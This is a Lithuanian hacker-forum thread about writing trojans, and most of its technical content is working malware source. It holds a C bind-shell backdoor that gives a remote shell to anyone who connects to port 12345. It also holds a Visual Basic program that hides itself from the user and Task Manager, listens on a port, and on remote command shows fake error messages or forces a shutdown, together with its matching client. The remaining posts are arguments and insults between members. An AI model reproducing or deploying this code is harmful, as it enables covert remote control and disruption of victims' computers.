Trojanai

[shellc0de]

Truputi pataisytas ir veikiantis variantas:

Kodas: Pasirinkti visus

#include <stdio.h> 
#include <errno.h> 
#include <signal.h> 
#include <stdlib.h> 
#include <netinet/in.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <strings.h>
#include <iomanip>
using namespace std;

#define P 12345 
#define SH "/bin/sh" 
#define LISTN 5

int main(int argc, char **argv){

	char *fst = "\nConnected!\n\n"; 
	char *sec = "This tool demonstrated how works trojans\n"; 
	char *thr = "Please enter each command followed by ';'\n";

	int outsock, insock, sz; 
	struct sockaddr_in home; 
	struct sockaddr_in away;

	home.sin_family=AF_INET; 
	home.sin_port=htons(P); 
	home.sin_addr.s_addr=INADDR_ANY; 
	bzero(&(home.sin_zero),8); 

	signal(SIGCHLD,SIG_IGN); 


	if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) 
	exit(printf("Socket error\n")); 

	if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) 
	exit(printf("Bind error\n")); 

	if((listen(outsock,LISTN))<0) 
	exit(printf("Listen error\n")); 

	sz=sizeof(struct sockaddr_in); 

	socklen_t len = sz;
	for(;;) 
	{ 
		if((insock=accept(outsock,(struct sockaddr *)&away, &len))<0) 
			exit(printf("Accept error")); 
		if(fork() !=0) 
		{ 
			send(insock,fst,strlen(fst),0); 
			send(insock,sec,strlen(sec),0); 
			send(insock,thr,strlen(thr),0); 
			dup2(insock,0); 
			dup2(insock,1); 
			dup2(insock,2); 
			execl(SH,SH,(char *)0); 
			close(insock); 
			exit(0); 
		} 
		close(insock);
	}
}

Edit, ant windows programa neveiks

Na jau, malonu kad sugebėjai sudet funkcijų pradžios ir pabaigos simbolius ( atitinkamai { } ) Na čia sunkaus nieko nėra. Dėja šitas trojanas kuo puikiausiai veikia ant windows sistemos, tik reikia gerai pašlifuoti. Jei moki c nieko sunkaus nebus. Šiaip trojanus su assembler geriausia rašyt. Žadu parašyt straipsnį apie trojanų rašymą assembleriu,bet šis bus dar negreit

[shellc0de]

Na ziuriu rasom sorsus tai reik rasyt ir kas ant windows weiks:
VB:

Kodas: Pasirinkti visus

Private Sub Form_Load()
    Me.Visible = False
End Sub

Visi zinoms kad alt+ctl+del SUX tai sita kodo dalis tai isprendzia.

Kodas: Pasirinkti visus

Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
End Sub

Paislepiam dar geriau. Dabar jau vidutinis vartotojas musu neberas.

Kodas: Pasirinkti visus

Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
    win.LocalPort = 2999
    win.RemotePort = 455
    win.Listen
End Sub

Esmine dalis atidarom portus

Kodas: Pasirinkti visus

Private Sub win_ConnectionRequest(ByVal requestID As Long)
    win.Close
    win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
   win.GetData GotDat
   DoActions (GotDat)
End Sub

Sita vietele priima susijungima ir paleizdia sekancia funkcija

Kodas: Pasirinkti visus

Public Function DoActions(x As String)

Select Case x
       Case "msgbox"
            Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

       Case "shutdown"
            shell "shutdown -s -f -t 00"
End Select
End Function

MSG BOX cheche. be to atkreipiam demesi i shutdown.
Sweikinu trojanas baigtas.
******************
BENDRAS VAIZDELIS:
MAIN

Kodas: Pasirinkti visus

Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
    win.LocalPort = 2999
    win.RemotePort = 455
    win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
    win.Close
    win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

MODULE

Kodas: Pasirinkti visus

Public Function DoActions(x As String)

Select Case x
       Case "msgbox"
            Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

       Case "shutdown"
            shell "shutdown -s -f -t 00"
End Select
End Function

````````````````````````````````````

Dar galim parasyt kienta to trojano va taip:

Kodas: Pasirinkti visus

Private Sub cmdConnect_Click()
    IpAddy = txtIp.Text
    Win.Close
    Win.RemotePort = 2999
    Win.RemoteHost = IpAddy
    Win.LocalPort = 9999
    Win.Connect
    cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
    Win.Close
    cmdConnect.Enabled = True
End Sub
         
Private Sub cmdMsgbox_Click()
    Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
    Win.SendData "shutdown"
End Sub

Va tep wyksta su windows ir VB viskas.

Šaunuolis GODHack, tik šiaip galėjai naudot c arba c++, nors šiaip pats geriausias variantas būtų viską perrašyt assembleriu. Taip ir toliau ...

[Lioniax]

...
Na jau, malonu kad sugebėjai sudet funkcijų pradžios ir pabaigos simbolius ( atitinkamai { } ) Na čia sunkaus nieko nėra. Dėja šitas trojanas kuo puikiausiai veikia ant windows sistemos, tik reikia gerai pašlifuoti. Jei moki c nieko sunkaus nebus. Šiaip trojanus su assembler geriausia rašyt. Žadu parašyt straipsnį apie trojanų rašymą assembleriu,bet šis bus dar negreit

Jei truputi prasikrapstytum akis, tai matytai kas buvo pakeista. Beje, taisydamas koda turejau tokia nuojauta, kad tos klaidos buvo paliktos specialiai, su tikslu, ir is tavo sio komentaro kyla itarimas, kad trojana rasei ne pats...
Sitas trojanas ant windowsu neveiks, nes windowsai nesuportina tokiu system call'u kaip fork() arba exec(). Tai reiskia kad reiktu pakeist kai kurias kodo vietas, ir tai jau nebutu paprastas slifavimas. nu cia, mano nuomone...

[shellc0de]

...
Na jau, malonu kad sugebėjai sudet funkcijų pradžios ir pabaigos simbolius ( atitinkamai { } ) Na čia sunkaus nieko nėra. Dėja šitas trojanas kuo puikiausiai veikia ant windows sistemos, tik reikia gerai pašlifuoti. Jei moki c nieko sunkaus nebus. Šiaip trojanus su assembler geriausia rašyt. Žadu parašyt straipsnį apie trojanų rašymą assembleriu,bet šis bus dar negreit

Jei truputi prasikrapstytum akis, tai matytai kas buvo pakeista. Beje, taisydamas koda turejau tokia nuojauta, kad tos klaidos buvo paliktos specialiai, su tikslu, ir is tavo sio komentaro kyla itarimas, kad trojana rasei ne pats...
Sitas trojanas ant windowsu neveiks, nes windowsai nesuportina tokiu system call'u kaip fork() arba exec(). Tai reiskia kad reiktu pakeist kai kurias kodo vietas, ir tai jau nebutu paprastas slifavimas. nu cia, mano nuomone...

Kaip cia pasakius, ne visi akli mato ( cia taikau sau ) Siaip sitas trojanas veikia ir ant windows, tik jis veikia labiau kaip backdoor'as nei kaip trojanas paekspermentuok su kompileriu, beto fork() exec() ant windowsu veikia tik reikia vienos l.specifines bibliotekos

[brain5ide]

Patarimas: necituokit didelių postų, nes nekaip atrodo: vienas įmetė tutorialą, o dar du jį citavo.

shellcode, vienas message'as yra netaisyklingas:
"This tool demonstrated how works trojans\n" keičiam į "This tool demonstrates how trojans work\n"

[shellc0de]

Patarimas: necituokit didelių postų, nes nekaip atrodo: vienas įmetė tutorialą, o dar du jį citavo.

shellcode, vienas message'as yra netaisyklingas:
"This tool demonstrated how works trojans\n" keičiam į "This tool demonstrates how trojans work\n"

brain5ide aciu , nors siaip tai nera jokio skirtumo ten gali but ir prasyt " sveikas atvykes zasine i meslyna serveri kuri tu padarei \n"

[MaksasMks]

Tai, kad redagavai pirma posta lb gerai, nes db jis labiau suprantamas ir kažko vertas.

Dėja, jeigu žmonės suteikia man malonumą pažiūret į jų lygį , tai ...

Na taip čia yra "Hakerių diskusija", bet galbūt kituose temuose kitiems tu suteiktum malonumą pažiūrėti į tavo lygi. Jeigu šioje temoje nusimanai už kažką daugiau, tai nebūtina savęs kelti.

[shellc0de]

Tai, kad redagavai pirma posta lb gerai, nes db jis labiau suprantamas ir kažko vertas.

Dėja, jeigu žmonės suteikia man malonumą pažiūret į jų lygį , tai ...

Na taip čia yra "Hakerių diskusija", bet galbūt kituose temuose kitiems tu suteiktum malonumą pažiūrėti į tavo lygi. Jeigu šioje temoje nusimanai už kažką daugiau, tai nebūtina savęs kelti.

Gerb. Maksas kitose temose aš nesikabinėju ir savo durnos nuomonės nereiškiu. O šitose IT saugumo temose aš save galiu kelti kiek noriu. Todėl, kad tai mano darbas, ir aš jau 10 metų už tai gaunu atlyginimą.

[Lioniax]

kazkaip nesitiki, bet jeigu jau taip sakai...

[DF]

Tai, kad redagavai pirma posta lb gerai, nes db jis labiau suprantamas ir kažko vertas.

Dėja, jeigu žmonės suteikia man malonumą pažiūret į jų lygį , tai ...

Na taip čia yra "Hakerių diskusija", bet galbūt kituose temuose kitiems tu suteiktum malonumą pažiūrėti į tavo lygi. Jeigu šioje temoje nusimanai už kažką daugiau, tai nebūtina savęs kelti.

Gerb. Maksas kitose temose aš nesikabinėju ir savo durnos nuomonės nereiškiu. O šitose IT saugumo temose aš save galiu kelti kiek noriu. Todėl, kad tai mano darbas, ir aš jau 10 metų už tai gaunu atlyginimą.

Gerai chia skambas ir savo durnos nuomones nereishkiu

[MaksasMks]

Gerb. shellc0de, manau esi jau garbaus amžio žmogus ir esi užsitarnavęs kažką, kelk save jeigu nori, bet ar tikrai tu to nori ;] Viskas manes čia nėr turbūt keles dienas šitam forume

[shellc0de]

Gerb. shellc0de, manau esi jau garbaus amžio žmogus ir esi užsitarnavęs kažką, kelk save jeigu nori, bet ar tikrai tu to nori ;] Viskas manes čia nėr turbūt keles dienas šitam forume

Gerb. Maksas tiesiog noriu parodyt visiem vaikam jų vietą visuomėnėje

[brain5ide]

Mano rankų vieta prie klaviatūros, o akių - prieš monitorių.

[DF]

Gerb. shellc0de, manau esi jau garbaus amžio žmogus ir esi užsitarnavęs kažką, kelk save jeigu nori, bet ar tikrai tu to nori ;] Viskas manes čia nėr turbūt keles dienas šitam forume

Gerb. Maksas tiesiog noriu parodyt visiem vaikam jų vietą visuomėnėje

Ka tu kam chia rodai? Kad pats vaikas esi.

[shellc0de]

Mano rankų vieta prie klaviatūros, o akių - prieš monitorių.

Brain5ide dar keli tokie komentarai ir ziauriai smuksi mano akyse